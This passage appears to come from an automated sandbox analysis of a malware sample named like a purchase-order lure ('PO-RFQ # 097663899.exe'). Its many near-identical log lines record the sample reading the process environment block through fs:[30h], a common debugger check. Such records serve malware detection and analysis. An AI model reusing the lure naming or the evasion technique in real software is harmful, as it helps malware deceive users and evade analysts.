          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]4_2_00EBB02A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]4_2_00EBB02A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBB02A mov eax, dword ptr fs:[00000030h]4_2_00EBB02A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDBC2C mov eax, dword ptr fs:[00000030h]4_2_00EDBC2C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F74015 mov eax, dword ptr fs:[00000030h]4_2_00F74015
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F74015 mov eax, dword ptr fs:[00000030h]4_2_00F74015
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27016 mov eax, dword ptr fs:[00000030h]4_2_00F27016
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27016 mov eax, dword ptr fs:[00000030h]4_2_00F27016
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27016 mov eax, dword ptr fs:[00000030h]4_2_00F27016
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61C06 mov eax, dword ptr fs:[00000030h]4_2_00F61C06
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]4_2_00F26C0A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]4_2_00F26C0A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]4_2_00F26C0A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26C0A mov eax, dword ptr fs:[00000030h]4_2_00F26C0A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7740D mov eax, dword ptr fs:[00000030h]4_2_00F7740D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7740D mov eax, dword ptr fs:[00000030h]4_2_00F7740D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7740D mov eax, dword ptr fs:[00000030h]4_2_00F7740D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F58DF1 mov eax, dword ptr fs:[00000030h]4_2_00F58DF1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]4_2_00EAB1E1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]4_2_00EAB1E1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB1E1 mov eax, dword ptr fs:[00000030h]4_2_00EAB1E1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBD5E0 mov eax, dword ptr fs:[00000030h]4_2_00EBD5E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBD5E0 mov eax, dword ptr fs:[00000030h]4_2_00EBD5E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F341E8 mov eax, dword ptr fs:[00000030h]4_2_00F341E8
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]4_2_00F26DC9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]4_2_00F26DC9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]4_2_00F26DC9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov ecx, dword ptr fs:[00000030h]4_2_00F26DC9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]4_2_00F26DC9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F26DC9 mov eax, dword ptr fs:[00000030h]4_2_00F26DC9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED35A1 mov eax, dword ptr fs:[00000030h]4_2_00ED35A1
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]4_2_00F251BE
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]4_2_00F251BE
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]4_2_00F251BE
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F251BE mov eax, dword ptr fs:[00000030h]4_2_00F251BE
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED61A0 mov eax, dword ptr fs:[00000030h]4_2_00ED61A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED61A0 mov eax, dword ptr fs:[00000030h]4_2_00ED61A0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F269A6 mov eax, dword ptr fs:[00000030h]4_2_00F269A6
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]4_2_00ED1DB5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]4_2_00ED1DB5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED1DB5 mov eax, dword ptr fs:[00000030h]4_2_00ED1DB5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F705AC mov eax, dword ptr fs:[00000030h]4_2_00F705AC
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F705AC mov eax, dword ptr fs:[00000030h]4_2_00F705AC
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]4_2_00EA2D8A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]4_2_00EA2D8A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]4_2_00EA2D8A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]4_2_00EA2D8A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA2D8A mov eax, dword ptr fs:[00000030h]4_2_00EA2D8A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA185 mov eax, dword ptr fs:[00000030h]4_2_00EDA185
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]4_2_00ED2581
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]4_2_00ED2581
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]4_2_00ED2581
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2581 mov eax, dword ptr fs:[00000030h]4_2_00ED2581
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECC182 mov eax, dword ptr fs:[00000030h]4_2_00ECC182
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDFD9B mov eax, dword ptr fs:[00000030h]4_2_00EDFD9B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDFD9B mov eax, dword ptr fs:[00000030h]4_2_00EDFD9B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2990 mov eax, dword ptr fs:[00000030h]4_2_00ED2990
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC962 mov eax, dword ptr fs:[00000030h]4_2_00EAC962
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB171 mov eax, dword ptr fs:[00000030h]4_2_00EAB171
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAB171 mov eax, dword ptr fs:[00000030h]4_2_00EAB171
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECC577 mov eax, dword ptr fs:[00000030h]4_2_00ECC577
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECC577 mov eax, dword ptr fs:[00000030h]4_2_00ECC577
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECB944 mov eax, dword ptr fs:[00000030h]4_2_00ECB944
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECB944 mov eax, dword ptr fs:[00000030h]4_2_00ECB944
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE3D43 mov eax, dword ptr fs:[00000030h]4_2_00EE3D43
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F23540 mov eax, dword ptr fs:[00000030h]4_2_00F23540
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC7D50 mov eax, dword ptr fs:[00000030h]4_2_00EC7D50
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78D34 mov eax, dword ptr fs:[00000030h]4_2_00F78D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F2A537 mov eax, dword ptr fs:[00000030h]4_2_00F2A537
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]4_2_00EC4120
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]4_2_00EC4120
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]4_2_00EC4120
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov eax, dword ptr fs:[00000030h]4_2_00EC4120
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC4120 mov ecx, dword ptr fs:[00000030h]4_2_00EC4120
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]4_2_00ED4D3B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]4_2_00ED4D3B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4D3B mov eax, dword ptr fs:[00000030h]4_2_00ED4D3B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED513A mov eax, dword ptr fs:[00000030h]4_2_00ED513A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED513A mov eax, dword ptr fs:[00000030h]4_2_00ED513A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAD30 mov eax, dword ptr fs:[00000030h]4_2_00EAAD30
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB3D34 mov eax, dword ptr fs:[00000030h]4_2_00EB3D34
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]4_2_00EA9100
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]4_2_00EA9100
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9100 mov eax, dword ptr fs:[00000030h]4_2_00EA9100
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB76E2 mov eax, dword ptr fs:[00000030h]4_2_00EB76E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2AE4 mov eax, dword ptr fs:[00000030h]4_2_00ED2AE4
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED16E0 mov ecx, dword ptr fs:[00000030h]4_2_00ED16E0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78ED6 mov eax, dword ptr fs:[00000030h]4_2_00F78ED6
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED36CC mov eax, dword ptr fs:[00000030h]4_2_00ED36CC
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2ACB mov eax, dword ptr fs:[00000030h]4_2_00ED2ACB
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE8EC7 mov eax, dword ptr fs:[00000030h]4_2_00EE8EC7
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5FEC0 mov eax, dword ptr fs:[00000030h]4_2_00F5FEC0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA52A5 mov eax, dword ptr fs:[00000030h]4_2_00EA52A5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]4_2_00F70EA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]4_2_00F70EA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F70EA5 mov eax, dword ptr fs:[00000030h]4_2_00F70EA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F246A7 mov eax, dword ptr fs:[00000030h]4_2_00F246A7
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]4_2_00EBAAB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBAAB0 mov eax, dword ptr fs:[00000030h]4_2_00EBAAB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDFAB0 mov eax, dword ptr fs:[00000030h]4_2_00EDFAB0
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FE87 mov eax, dword ptr fs:[00000030h]4_2_00F3FE87
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDD294 mov eax, dword ptr fs:[00000030h]4_2_00EDD294
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDD294 mov eax, dword ptr fs:[00000030h]4_2_00EDD294
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB766D mov eax, dword ptr fs:[00000030h]4_2_00EB766D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE927A mov eax, dword ptr fs:[00000030h]4_2_00EE927A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5B260 mov eax, dword ptr fs:[00000030h]4_2_00F5B260
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5B260 mov eax, dword ptr fs:[00000030h]4_2_00F5B260
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78A62 mov eax, dword ptr fs:[00000030h]4_2_00F78A62
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECAE73 mov eax, dword ptr fs:[00000030h]4_2_00ECAE73
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F34257 mov eax, dword ptr fs:[00000030h]4_2_00F34257
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA9240 mov eax, dword ptr fs:[00000030h]4_2_00EA9240
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB7E41 mov eax, dword ptr fs:[00000030h]4_2_00EB7E41
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE4A2C mov eax, dword ptr fs:[00000030h]4_2_00EE4A2C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE4A2C mov eax, dword ptr fs:[00000030h]4_2_00EE4A2C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5FE3F mov eax, dword ptr fs:[00000030h]4_2_00F5FE3F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAE620 mov eax, dword ptr fs:[00000030h]4_2_00EAE620
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB8A0A mov eax, dword ptr fs:[00000030h]4_2_00EB8A0A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]4_2_00EAC600
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]4_2_00EAC600
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAC600 mov eax, dword ptr fs:[00000030h]4_2_00EAC600
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED8E00 mov eax, dword ptr fs:[00000030h]4_2_00ED8E00
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EC3A1C mov eax, dword ptr fs:[00000030h]4_2_00EC3A1C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA61C mov eax, dword ptr fs:[00000030h]4_2_00EDA61C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA61C mov eax, dword ptr fs:[00000030h]4_2_00EDA61C
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov ecx, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA5210 mov eax, dword ptr fs:[00000030h]4_2_00EA5210
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAA16 mov eax, dword ptr fs:[00000030h]4_2_00EAAA16
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAAA16 mov eax, dword ptr fs:[00000030h]4_2_00EAAA16
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F61608 mov eax, dword ptr fs:[00000030h]4_2_00F61608
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECDBE9 mov eax, dword ptr fs:[00000030h]4_2_00ECDBE9
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED03E2 mov eax, dword ptr fs:[00000030h]4_2_00ED03E2
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EE37F5 mov eax, dword ptr fs:[00000030h]4_2_00EE37F5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F253CA mov eax, dword ptr fs:[00000030h]4_2_00F253CA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F253CA mov eax, dword ptr fs:[00000030h]4_2_00F253CA
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]4_2_00ED4BAD
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]4_2_00ED4BAD
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED4BAD mov eax, dword ptr fs:[00000030h]4_2_00ED4BAD
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F75BA5 mov eax, dword ptr fs:[00000030h]4_2_00F75BA5
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB1B8F mov eax, dword ptr fs:[00000030h]4_2_00EB1B8F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB1B8F mov eax, dword ptr fs:[00000030h]4_2_00EB1B8F
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]4_2_00F27794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]4_2_00F27794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F27794 mov eax, dword ptr fs:[00000030h]4_2_00F27794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F5D380 mov ecx, dword ptr fs:[00000030h]4_2_00F5D380
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED2397 mov eax, dword ptr fs:[00000030h]4_2_00ED2397
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F6138A mov eax, dword ptr fs:[00000030h]4_2_00F6138A
